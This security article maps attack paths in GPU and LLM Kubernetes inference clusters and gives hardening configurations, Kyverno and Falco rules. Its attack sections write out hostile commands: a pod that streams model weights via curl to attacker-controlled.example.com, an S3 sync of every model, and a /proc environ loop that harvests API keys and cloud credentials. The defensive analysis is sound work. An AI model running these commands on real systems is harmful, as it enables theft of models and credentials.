Compromising an AI Inference Cluster: Attack Paths Unique to GPU and LLM Kubernetes Deployments

The Problem

An AI inference cluster looks like a Kubernetes cluster. It has nodes, namespaces, PersistentVolumes, and RBAC policies. But deploying LLM inference workloads creates attack surface that does not exist in a cluster running stateless microservices: a DaemonSet that runs on every GPU node with host device access, multi-gigabyte model weight files stored on ReadWriteMany network volumes, cloud IAM roles scoped to an entire model registry, and NodeAffinity policies that concentrate every interesting workload on a handful of expensive nodes. An attacker who understands this topology has a materially different target than the standard Kubernetes threat model accounts for.

This article maps five attack surfaces specific to LLM inference infrastructure. Each one represents a class of misconfiguration that is common in practice — not because operators are careless, but because the default configurations recommended in GPU device plugin documentation, cloud model registry setup guides, and vLLM deployment tutorials optimise for getting the model serving as fast as possible. Security review happens after the cluster is already running production traffic.

The attack chain that follows is realistic. Each step uses techniques that work against real deployments.

Attack Surface 1: NVIDIA GPU Device Plugin DaemonSet

The nvidia-device-plugin DaemonSet is the mechanism by which Kubernetes learns that GPU nodes have GPU resources available for scheduling. It advertises GPU capacity to the kubelet via the device plugin API, allowing pods to request nvidia.com/gpu: 1 resources. To do this, it needs access to GPU device files and the NVIDIA persistence daemon socket.

The default deployment, as shown in official NVIDIA documentation and Helm chart defaults, runs with more privilege than the device registration function strictly requires:

# from the nvidia/gpu-operator helm chart defaults — redacted for brevity
containers:
- name: nvidia-device-plugin-ctr
  image: nvcr.io/nvidia/k8s-device-plugin:v0.16.0
  securityContext:
    privileged: true   # entire surface — not required for device registration
  volumeMounts:
  - name: device-plugin
    mountPath: /var/lib/kubelet/device-plugins
  - name: dev
    mountPath: /dev    # all host devices, not just GPU devices

Running privileged on a DaemonSet that covers every GPU node means: any vulnerability in the device plugin process, in its container image, or in the gRPC interface it exposes to the kubelet gives an attacker access to the full host device namespace. From inside a privileged container with /dev mounted from the host, accessing GPU device files is direct:

# From inside a compromised nvidia-device-plugin pod:
ls /dev/nvidia*
# /dev/nvidia0  /dev/nvidia1  /dev/nvidiactl  /dev/nvidia-uvm  /dev/nvidia-uvm-tools

nvidia-smi
# Fri May  9 10:22:18 2026
# +-----------------------------------------------------------------------------+
# | NVIDIA-SMI 550.54.15  Driver Version: 550.54.15  CUDA Version: 12.4        |
# +-----------------------------------------------------------------------------+
# | GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
# | Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
# |=============================================================================|
# |   0  NVIDIA A100-SXM4-40GB Off| 00000000:00:04.0 Off|                    0 |
# |  N/A   37C    P0   55W / 400W |  38204MiB / 40960MiB |     79%      Default |

The GPU memory occupied (38204MiB / 40960MiB) represents a live inference workload. CUDA contexts created by other pods on the same node do not have hardware-enforced memory isolation between processes on the same physical GPU in a single-GPU-per-pod allocation model — only between GPUs. An attacker with direct GPU device file access can create a CUDA context on the same device and read physical memory regions, including model weights and in-flight inference buffers. This is not a novel technique: it is the GPU equivalent of reading /proc/PID/mem for a process you share a host with.

The persistence daemon socket at /run/nvidia-persistenced/socket allows controlling GPU persistence mode — a secondary risk that enables denial of service by toggling GPU state.

Attack Surface 2: Model Weight PersistentVolumes

A Llama 3 70B deployment requires approximately 140 GB of disk for bfloat16 weights stored as .safetensors shards. Serving this model across multiple replicas for throughput means multiple pods need simultaneous read access to the same files. The natural Kubernetes solution is a ReadWriteMany PersistentVolume backed by NFS, EFS, or CephFS. This design solves the operational problem and introduces a new one.

In a namespace where an attacker can create pods — which requires only the create pods permission in that namespace, not cluster-admin — they can mount any PVC that exists in that namespace simply by naming it in a PodSpec:

kubectl run weight-exfil \
  --image=alpine \
  --restart=Never \
  --overrides='{
    "spec": {
      "nodeSelector": {"nvidia.com/gpu.present": "true"},
      "volumes": [{
        "name": "model",
        "persistentVolumeClaim": {"claimName": "llama3-70b-weights"}
      }],
      "containers": [{
        "name": "exfil",
        "image": "alpine",
        "command": ["sh", "-c",
          "apk add curl && tar czf - /model | curl -T - https://attacker-controlled.example.com/upload"
        ],
        "volumeMounts": [{
          "name": "model",
          "mountPath": "/model"
        }]
      }]
    }
  }'

This pod starts, mounts the model weight volume, streams 140 GB of proprietary weights to attacker-controlled infrastructure, and exits. The Kubernetes admission control path for pods does not, by default, restrict which pods can mount which PVCs. The API server validates that the PVC exists and is in the correct namespace. Nothing in the standard admission chain asks whether this pod has a legitimate reason to access model weights.

The same technique applies to ReadWriteOnce volumes if the attacker’s pod can be scheduled to the same node as the existing consumer pod — which NodeAffinity requirements make predictable, since all inference pods land on GPU nodes.

A related variant targets the PV directly at the storage layer. NFS exports backing model weight volumes are frequently configured with broad client CIDR ranges to simplify pod scheduling across node groups. Any pod in the cluster whose node can reach the NFS server IP can attempt to mount the export directly:

# From any pod with network access to the NFS server:
mount -t nfs nfs-server.internal:/exports/model-weights /mnt/weights
ls /mnt/weights/
# llama-3-70b-instruct-f16-00001-of-00008.safetensors
# llama-3-70b-instruct-f16-00002-of-00008.safetensors
# ...

No Kubernetes API call. No admission webhook. Just a network-layer mount.

Attack Surface 3: Cloud IAM and Model Registry Access

Inference pods need to download model weights at startup, either from a model registry bucket on initial deployment or on scale-out when new replicas start before the weight volume is pre-populated. The standard pattern is IRSA on AWS (IAM Roles for Service Accounts) or Workload Identity on GCP, attaching a cloud IAM role to the Kubernetes service account that inference pods run under.

The common misconfiguration is scoping this role to the bucket rather than to the specific prefix corresponding to a single model. A role policy that reads:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": [
      "arn:aws:s3:::company-models",
      "arn:aws:s3:::company-models/*"
    ]
  }]
}

grants the inference pod for the publicly available Llama 3 70B model access to every proprietary fine-tuned variant the organisation has ever uploaded to that bucket. Fine-tuned models represent months of human feedback data collection, labelling costs, and captured intellectual property. From a compromised inference pod, or from any pod running under the same service account:

# From inside a pod running under the inference service account:
aws s3 ls s3://company-models/
# 2026-01-15  PRE llama3-70b-base/
# 2026-02-03  PRE llama3-70b-finance-finetuned/
# 2026-03-21  PRE llama3-70b-medical-finetuned/
# 2026-04-02  PRE gpt4-class-proprietary-distillation/

aws s3 sync s3://company-models/ /tmp/stolen/
# download: s3://company-models/llama3-70b-finance-finetuned/...

The IRSA credential is a short-lived STS token available at the pod metadata endpoint. It refreshes automatically. An attacker with shell access to the pod has indefinite access to the credential as long as they maintain their foothold.

On GCP the equivalent is Workload Identity binding a Kubernetes service account to a GCP service account with storage.objectViewer on the model bucket. The token is available at the GCP metadata endpoint (http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token) and suffers from the same overly broad scope pattern.

Attack Surface 4: Inference API as Exfiltration Proxy

vLLM, Triton Inference Server, and Text Generation Inference all expose HTTP APIs that accept arbitrary text. Internal inference clusters typically do not apply API key authentication to the inference server itself — authentication is handled by a gateway or application layer upstream. The inference server accepts any HTTP request that reaches its port.

A compromised service sitting between the user-facing API and the inference backend — a compromised gateway pod, a compromised sidecar, or a pod that has established a connection through permissive NetworkPolicy — can perform two distinct attacks without any special permissions.

The first is passive logging. Every user prompt and every model response flows through the inference API as plaintext HTTP. A man-in-the-path attacker logging all inference traffic captures the full PII surface of everyone who has interacted with the model: medical queries, financial data, confidential business context passed in system prompts, authentication credentials that users paste into chat interfaces.

The second is model extraction via unrestricted query volume. External model APIs enforce rate limits and cost barriers that make systematic model extraction expensive. Internal inference servers have neither. An attacker with access to the inference endpoint can issue hundreds of thousands of queries — systematically probing the model with inputs designed to reconstruct its behaviour and, for fine-tuned models, the training signal embedded in its weights. There is no audit trail in the inference server itself: vLLM and TGI do not log queries by default.

Attack Surface 5: GPU Node Concentration

A standard Kubernetes cluster distributes workloads across many heterogeneous nodes. An AI inference cluster concentrates every sensitive workload on a small number of expensive GPU nodes due to NodeAffinity and resource requirements. A cluster with 200 nodes might have 8 GPU nodes. All inference pods run on those 8 nodes. All GPU device plugin pods run on those 8 nodes. All model weight volume mount activity happens on those 8 nodes.

Compromising a single GPU node — through a container escape, a privileged pod deployment, or a vulnerability in node-level software — gives access to the environment of every pod running on that node. From a pod on the same node as multiple inference workloads, /proc exposes the environment of every other process:

# From a compromised pod on a GPU node (not even privileged — just on the same node):
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
  env_data=$(cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n')
  echo "$env_data" | grep -E \
    "OPENAI_API_KEY|ANTHROPIC_API_KEY|HF_TOKEN|AWS_ACCESS_KEY|HUGGING_FACE_HUB_TOKEN|REPLICATE_API"
done
# HF_TOKEN=hf_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# AWS_ACCESS_KEY_ID=ASIAXXXXXXXXXXXXXXXX
# AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# OPENAI_API_KEY=sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

This works because /proc/PID/environ is readable by processes sharing the same user namespace when the /proc filesystem is mounted and process isolation is not enforced below the container level. Kubernetes containers on the same node share the host kernel — they do not have separate process namespace views unless the pod spec explicitly sets hostPID: false, which is the default, but the host’s /proc remains readable via the host filesystem path if the node is compromised. A privileged pod or a container escape makes all of this accessible without any process namespace tricks.

The concentration effect means a GPU node compromise is qualitatively different from compromising a node in a standard cluster. On a standard cluster, a node compromise gives you the workloads of that node — a fraction of the fleet. On a GPU cluster, a GPU node compromise gives you a large fraction of all inference workloads, all model weight access, and all the credentials those workloads hold.

Full Compromise Chain

The following chain is not theoretical. Each step uses techniques documented in real post-incident analysis:

Initial access via model serving API. A remote code execution vulnerability in the vLLM HTTP server (or a deserialization bug in Triton) gives shell access in the inference pod. vLLM’s model_executor has had multiple input handling bugs in its first two years of production deployment. Alternatively: the inference namespace allows arbitrary pod creation and an attacker with stolen CI credentials creates a pod directly.
Credential enumeration from pod environment. The inference pod environment contains HF_TOKEN, AWS_ACCESS_KEY_ID, and the mounted IRSA web identity token at /var/run/secrets/eks.amazonaws.com/serviceaccount/token. The IRSA token is exchanged for an STS credential with s3:GetObject on company-models/*.
Model exfiltration from S3. Using the STS credential, all model variants in s3://company-models/ are enumerated and synced to attacker-controlled object storage. 300 GB of fine-tuned model weights is exfiltrated over the pod’s outbound internet connection (which is unrestricted — inference pods need to reach the model registry).
PVC pivot via pod creation. The stolen CI credentials can create pods in the inference namespace. A pod mounting llama3-70b-weights (ReadWriteMany NFS) is created and streams the on-disk weights to attacker infrastructure as a redundant exfiltration path.
GPU node pivot via device plugin. The inference pod has node-level socket access. The device plugin DaemonSet runs privileged. A vulnerability in the device plugin (or simple exploitation of the broad /dev mount) provides access to the host. From the host, all pods running on the GPU node are accessible via their /proc entries and network namespaces.
Lateral movement to control plane. The node’s kubelet credential (/var/lib/kubelet/pki/kubelet-client-current.pem) allows authenticated API server requests scoped to the node. Depending on RBAC configuration, this may allow reading secrets from other namespaces, approving CSR requests to issue additional certificates, or accessing the kubelet API on other nodes.

Total time from initial inference pod shell to complete model exfiltration: under 30 minutes, assuming the IAM policy misconfiguration is present. Detection surface without specific Falco rules: near zero. The Kubernetes audit log shows a pod creation and some S3 API calls. Nothing raises an alert in a default cluster.

Threat Model

Compromised nvidia-device-plugin pod → privileged host device access → GPU memory readable for all workloads on node → model weights and in-flight inference data exposed
Pod with create pods RBAC permission in inference namespace → mounts model weight PVC → 100-400 GB proprietary model exfiltrated without any authentication beyond Kubernetes namespace membership
IRSA/Workload Identity with bucket-level scope → compromised inference pod exchanges STS token → all models in registry downloaded, including proprietary fine-tuned variants
Compromised inference API proxy → all user queries and responses logged in plaintext → full PII exposure for all model users
GPU node compromise via any vector → /proc enumeration of all pods on node → all API keys, cloud credentials, and HuggingFace tokens in pod environments captured
Unrestricted inference server network access → systematic model extraction queries → model behaviour reconstructed without needing weight access

Hardening Configuration

1. Drop Privileges from the GPU Device Plugin

The nvidia-device-plugin does not require privileged: true to register devices with the kubelet. It requires access to specific device files and the device plugin socket. Run it with the minimum capabilities:

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: nvidia-device-plugin
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: nvidia-device-plugin
  template:
    spec:
      priorityClassName: system-node-critical
      containers:
      - name: nvidia-device-plugin-ctr
        image: nvcr.io/nvidia/k8s-device-plugin:v0.16.0@sha256:a8e2f324d1d3fccc35a27c4f6f17c11b1a3b6b6b3c4c3d3e3f3a3b3c3d3e3f3a
        securityContext:
          privileged: false
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          capabilities:
            drop: ["ALL"]
        volumeMounts:
        - name: device-plugin
          mountPath: /var/lib/kubelet/device-plugins
        - name: dev-nvidia
          mountPath: /dev/nvidia0      # specific GPU, not entire /dev
          readOnly: false
        - name: dev-nvidiactl
          mountPath: /dev/nvidiactl
          readOnly: false
      volumes:
      - name: device-plugin
        hostPath:
          path: /var/lib/kubelet/device-plugins
      - name: dev-nvidia
        hostPath:
          path: /dev/nvidia0
          type: CharDevice
      - name: dev-nvidiactl
        hostPath:
          path: /dev/nvidiactl
          type: CharDevice

If the GPU operator Helm chart forces privileged: true, file an issue upstream and use a PodSecurityPolicy (deprecated) or ValidatingAdmissionWebhook to enforce the constraint independently. Operators routinely accept the default because “it worked with privileged” during initial deployment and the risk is not visible.

Verify the current privilege level in your cluster:

kubectl get daemonset nvidia-device-plugin -n kube-system \
  -o jsonpath='{.spec.template.spec.containers[*].securityContext.privileged}'
# Should output empty or false — if it outputs "true", you are running privileged

2. Restrict Model Weight PVC Mounts with Kyverno

Kubernetes has no native mechanism to restrict which pods can mount which PVCs. Kyverno enforces this via admission control. A ClusterPolicy that denies pod creation if the pod mounts a model weight PVC but does not carry the role: inference label:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-model-pvc-mounts
  annotations:
    policies.kyverno.io/title: Restrict Model Weight PVC Mounts
    policies.kyverno.io/description: >
      Model weight PVCs may only be mounted by pods explicitly labelled
      as inference workloads. Prevents unauthorised exfiltration of
      proprietary model weights.
spec:
  validationFailureAction: Enforce
  background: false
  rules:
  - name: only-inference-pods-mount-model-weights
    match:
      any:
      - resources:
          kinds: [Pod]
    preconditions:
      any:
      - key: "{{ request.object.spec.volumes[].persistentVolumeClaim.claimName[] | contains(@, 'model-weights') || contains(@, 'llama') || contains(@, 'weights') }}"
        operator: Equals
        value: true
    validate:
      message: >
        Model weight PVCs may only be mounted by pods with label role=inference.
        This pod is mounting a model weight PVC without the required label.
      deny:
        conditions:
          any:
          - key: "{{ request.object.metadata.labels.role || '' }}"
            operator: NotEquals
            value: inference

What this produces when a non-inference pod attempts to mount model weights:

Error from server: admission webhook "validate.kyverno.svc" denied the request:
policy Pod/ai-inference/weight-exfil for resource violation:
restrict-model-pvc-mounts/only-inference-pods-mount-model-weights:
Model weight PVCs may only be mounted by pods with label role=inference.
This pod is mounting a model weight PVC without the required label.

The label requirement is not sufficient as a sole control — labels are attacker-controllable. Pair it with a policy that restricts which identities can create pods with role: inference labels, enforced through RBAC on the create pods verb in the inference namespace.

3. Scope Cloud IAM Roles Per Model

Each model deployment gets its own IAM role, scoped to the exact S3 prefix that model uses. A Llama 3 70B inference deployment should not be able to access the finance fine-tune.

AWS IAM policy for a single-model inference role:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadSpecificModelWeights",
      "Effect": "Allow",
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::company-models/llama3-70b-instruct/*"
    },
    {
      "Sid": "ListSpecificModelPrefix",
      "Effect": "Allow",
      "Action": ["s3:ListBucket"],
      "Resource": "arn:aws:s3:::company-models",
      "Condition": {
        "StringLike": {
          "s3:prefix": ["llama3-70b-instruct/*"]
        }
      }
    }
  ]
}

The corresponding IRSA annotation on the Kubernetes ServiceAccount:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: llama3-70b-inference
  namespace: ai-inference
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/llama3-70b-inference-role
    eks.amazonaws.com/token-expiration: "3600"  # 1-hour token rotation

If a pod running under llama3-70b-inference service account attempts to access the finance fine-tune:

aws s3 ls s3://company-models/llama3-70b-finance-finetuned/
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation:
# Access Denied

Maintaining separate roles per model is operationally heavier than a single role. The correct abstraction is Terraform modules that generate a role per model deployment, parameterised on the model name and S3 prefix. The operational cost is one additional IAM role per model — the security value is that a compromised inference pod for model A cannot access model B.

4. Enforce NetworkPolicy Isolation on the Inference Namespace

Inference pods do not need to initiate connections to other pods in the cluster. They receive requests (handled by ingress), push metrics to Prometheus, and at startup download model weights from S3. Everything else is lateral movement surface.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: inference-pod-egress-isolation
  namespace: ai-inference
spec:
  podSelector:
    matchLabels:
      role: inference
  policyTypes:
  - Egress
  egress:
  # Model registry: S3 regional endpoint or VPC endpoint
  - to:
    - ipBlock:
        cidr: 10.0.0.0/8  # replace with VPC endpoint CIDR or specific S3 endpoint IP
    ports:
    - port: 443
      protocol: TCP
  # Metrics push to Prometheus
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: monitoring
    - podSelector:
        matchLabels:
          app: prometheus
    ports:
    - port: 9090
      protocol: TCP
  # DNS resolution
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    - podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: inference-pod-ingress-isolation
  namespace: ai-inference
spec:
  podSelector:
    matchLabels:
      role: inference
  policyTypes:
  - Ingress
  ingress:
  # Only accept requests from the inference gateway
  - from:
    - podSelector:
        matchLabels:
          role: inference-gateway
    ports:
    - port: 8000  # vLLM default port
      protocol: TCP

This policy blocks inference pods from reaching the Kubernetes API server, other pods in the namespace, and arbitrary external destinations. A compromised inference pod that attempts to reach 169.254.169.254 (IMDS) for lateral credential access gets no response. A pod that attempts to reach other pods in the cluster gets no response.

Verify the policy is enforced by attempting a connection from an inference pod to the API server:

kubectl exec -it <inference-pod> -- \
  curl -k https://kubernetes.default.svc/api/v1/namespaces -o /dev/null -w "%{http_code}"
# curl: (28) Connection timed out after 30001 milliseconds
# 000

5. Add Authentication to Internal Inference APIs

Even inference APIs that are “only accessible internally” should require authentication. Internal accessibility is not an access control — it means “any compromised pod in the cluster can query this without authentication.”

vLLM supports API key authentication via the --api-key flag. Set it:

# In the vLLM Deployment spec:
containers:
- name: vllm
  image: vllm/vllm-openai:v0.4.2
  args:
  - "--model"
  - "/model/llama3-70b-instruct"
  - "--api-key"
  - "$(VLLM_API_KEY)"
  env:
  - name: VLLM_API_KEY
    valueFrom:
      secretKeyRef:
        name: vllm-api-credentials
        key: api-key

Requests without a valid Authorization: Bearer <key> header receive a 401. An attacker who has reached the vLLM port but does not have the API key cannot issue queries. This does not prevent a fully compromised pod from reading the key from its own environment, but it eliminates query access from adjacent pods that have only network reachability.

For TGI (Text Generation Inference), the equivalent is the --master-port configuration with authentication middleware in front. Triton supports authentication via gRPC metadata.

6. Falco Rules for AI Cluster-Specific Threat Detection

Standard Falco rulesets do not cover AI inference-specific behaviours. Add rules targeting the specific attack techniques described above:

- rule: Model Weight PVC Mounted by Non-Inference Pod
  desc: >
    A pod that is not labelled as an inference pod mounted a volume
    whose PVC name matches model weight naming patterns. Possible
    model exfiltration attempt.
  condition: >
    ka.verb = "create" and
    ka.target.resource = "pods" and
    (
      ka.req.pod.volumes.persistentvolumeclaim.claimname pmatch ("*model*", "*weights*", "*llama*", "*mistral*")
    ) and
    not (ka.req.pod.labels contains "role:inference")
  output: >
    Non-inference pod mounting model weight PVC
    (user=%ka.user.name pod=%ka.req.pod.name ns=%ka.target.namespace
    pvc=%ka.req.pod.volumes.persistentvolumeclaim.claimname)
  priority: HIGH
  source: k8s_audit

- rule: Inference Pod Reading Sibling Process Environ
  desc: >
    An inference pod is reading /proc/PID/environ of another process.
    This is the pattern for credential harvesting from co-scheduled
    pods on the same node.
  condition: >
    open_read and
    fd.name glob "/proc/*/environ" and
    container.label.role = "inference" and
    not proc.name in (ps, top, monitoring_agent)
  output: >
    Inference pod reading sibling process environment variables
    (container=%container.name pod=%k8s.pod.name
    file=%fd.name proc=%proc.name)
  priority: CRITICAL
  source: syscall

- rule: Unexpected Outbound Connection from Inference Pod
  desc: >
    An inference pod initiated an outbound TCP connection to a
    destination not in the approved egress list. May indicate
    active exfiltration.
  condition: >
    outbound and
    container.label.role = "inference" and
    not fd.rip in (model_registry_ips) and
    not fd.rip in (prometheus_ips) and
    not fd.rip in (dns_server_ips)
  output: >
    Inference pod unexpected outbound connection
    (container=%container.name pod=%k8s.pod.name
    dest=%fd.rip:%fd.rport proc=%proc.cmdline)
  priority: HIGH
  source: syscall

- rule: GPU Device Plugin Spawning Shell
  desc: >
    The nvidia-device-plugin spawned an interactive shell or
    unexpected subprocess. Possible exploitation of device plugin.
  condition: >
    spawned_process and
    container.image.repository contains "nvidia" and
    container.image.repository contains "device-plugin" and
    proc.name in (bash, sh, dash, zsh, python, python3)
  output: >
    nvidia-device-plugin spawning shell
    (container=%container.name image=%container.image.repository
    shell=%proc.name cmdline=%proc.cmdline)
  priority: CRITICAL
  source: syscall

Deploy these rules via a Falco ConfigMap and mount them into the Falco DaemonSet under /etc/falco/rules.d/ai-inference.yaml. Alerts should route to your SIEM with the pod name, namespace, and relevant file path for triage.

7. Audit GPU Node Access and Process Namespace Visibility

Reduce the /proc enumeration surface by ensuring that pods cannot see processes outside their container. This is controlled by the shareProcessNamespace pod spec field, which defaults to false, and by ensuring that host PID is not enabled:

# Verify no inference pods have hostPID enabled:
kubectl get pods -n ai-inference -o json | jq -r '
  .items[] |
  select(.spec.hostPID == true) |
  .metadata.name
'
# Should produce no output. Any output is a critical misconfiguration.

# Verify no inference pods share process namespace with the node:
kubectl get pods -n ai-inference -o json | jq -r '
  .items[] |
  select(.spec.shareProcessNamespace == true) |
  .metadata.name
'

For the GPU device plugin itself, hostPID: true is never required for device registration. If it is present in your DaemonSet spec, remove it.

Expected Behaviour After Hardening

After deploying the Kyverno policy: a pod creation attempt that mounts llama3-70b-weights without role: inference receives an admission denial before the pod is created. No compute is consumed. The denial is logged by Kyverno and surfaced in the Kubernetes audit log with the policy name and the specific condition that failed.

After scoping IRSA roles per model: a pod running under the llama3-70b-inference service account that attempts aws s3 ls s3://company-models/llama3-70b-finance-finetuned/ receives an AccessDenied error from the S3 API. The access attempt is logged in AWS CloudTrail under the role ARN, making the attempt attributable to the specific service account.

After deploying NetworkPolicy: a compromised inference pod that attempts curl http://169.254.169.254/latest/meta-data/ times out with no response. A pod that attempts to reach another pod in the cluster via ClusterIP receives a TCP RST. The inference pod can reach its approved egress destinations — the S3 VPC endpoint, Prometheus, and DNS — and nothing else.

After deploying Falco rules: when the Model Weight PVC Mounted by Non-Inference Pod rule fires, the alert is available within seconds of the API server processing the pod creation request. The audit log event includes the PVC claim name and the user identity that submitted the pod spec, enabling rapid triage of whether the activity was authorised or an active incident.

Trade-offs

ReadWriteMany PVC for model weights requires a network filesystem: NFS, EFS on AWS, or Filestore on GCP. Network filesystem latency adds to model load time at pod startup. A Llama 3 70B model loading from EFS takes 4-8 minutes depending on network bandwidth allocation; the same load from local NVMe takes under 90 seconds. The operational response is pre-loading weights to a node-local cache on startup, with the PVC as the source of truth. This adds complexity but retains the security boundary: the PVC with ReadOnlyMany access mode cannot be written by inference pods, protecting the canonical weight file from tampering.

Per-model IRSA roles multiply the number of IAM roles in the account. An organisation running 20 model variants has 20 inference IAM roles plus associated trust policies and IRSA annotations. Infrastructure-as-code (Terraform, Pulumi) eliminates the manual maintenance burden, but the pattern must be adopted from the beginning of the cluster build — retrofitting per-model roles onto an existing single-role deployment requires coordinated changes to IAM, Kubernetes service accounts, and pod specs simultaneously.

Dropping privileged: true from the nvidia-device-plugin may break certain GPU operator configurations. The GPU operator bundles the device plugin with additional components (MIG manager, DCGM exporter, container toolkit) that have different privilege requirements. Audit each component individually: the device plugin itself requires device file access, not full privilege; the DCGM exporter for metrics collection also does not require privilege; the container toolkit installer does require elevated access but runs as a one-time init container, not continuously. Do not accept privileged: true for the long-running device plugin container without verifying that no less privileged configuration works.

Inference API authentication adds overhead to every request. At high throughput — tens of thousands of requests per second on a busy inference cluster — the JWT validation or API key lookup overhead is measurable. The practical mitigation is to validate at the gateway and pass a trusted header to the inference server, rather than validating at the inference server for each request. This keeps the authentication overhead out of the hot path while maintaining the security boundary.

Failure Modes

The nvidia-device-plugin runs privileged by default in official documentation examples. Platform teams who follow the quickstart guide and do not read the security considerations section deploy privileged DaemonSets on every GPU node. Because the device plugin works correctly in this configuration and GPU workloads schedule successfully, there is no operational signal that the privilege level is wrong. This remains in place indefinitely unless a security review explicitly targets DaemonSet privilege levels.

Single IRSA role for all inference workloads is the natural outcome of a “let me get the model loading first” deployment approach. The role is created with broad S3 access to unblock the deployment, and a ticket is filed to scope it later. The ticket is never prioritised because the cluster is serving traffic successfully. Months later, the cluster has three proprietary fine-tuned models all accessible via the same role that the original base model deployment used.

ReadWriteMany PVCs without admission control are invisible to the Kubernetes RBAC system. Any principal with create pods in the inference namespace — which includes developers with namespace-level edit access — can mount any PVC in that namespace. This is frequently the case in development clusters that share a namespace with production models. The two controls required to close this are: Kyverno or OPA Gatekeeper admission policies that restrict PVC mounts by pod label, and RBAC that restricts who can create pods in the inference namespace to the CI system service account only.

No NetworkPolicy on the inference namespace means that a compromised inference pod has a flat network to the entire cluster. It can reach the Kubernetes API server (kubernetes.default.svc), etcd if exposed, other namespaces’ ClusterIP services, and cloud provider metadata endpoints. NetworkPolicy is opt-in in Kubernetes — the absence of a policy means allow-all, not deny-all. A cluster that has not explicitly restricted inference pod egress has the most permissive possible default.

Falco rules for standard Kubernetes threats do not detect AI inference-specific patterns. A standard Falco ruleset will alert on obvious syscall anomalies and known container escape techniques, but will not fire on a pod mounting a model weight PVC with an exfiltration command, on systematic querying of an unauthenticated inference API, or on the specific /proc/PID/environ access pattern used for GPU node credential harvesting. AI inference clusters require AI inference-specific detection rules, deployed in addition to — not instead of — the standard ruleset.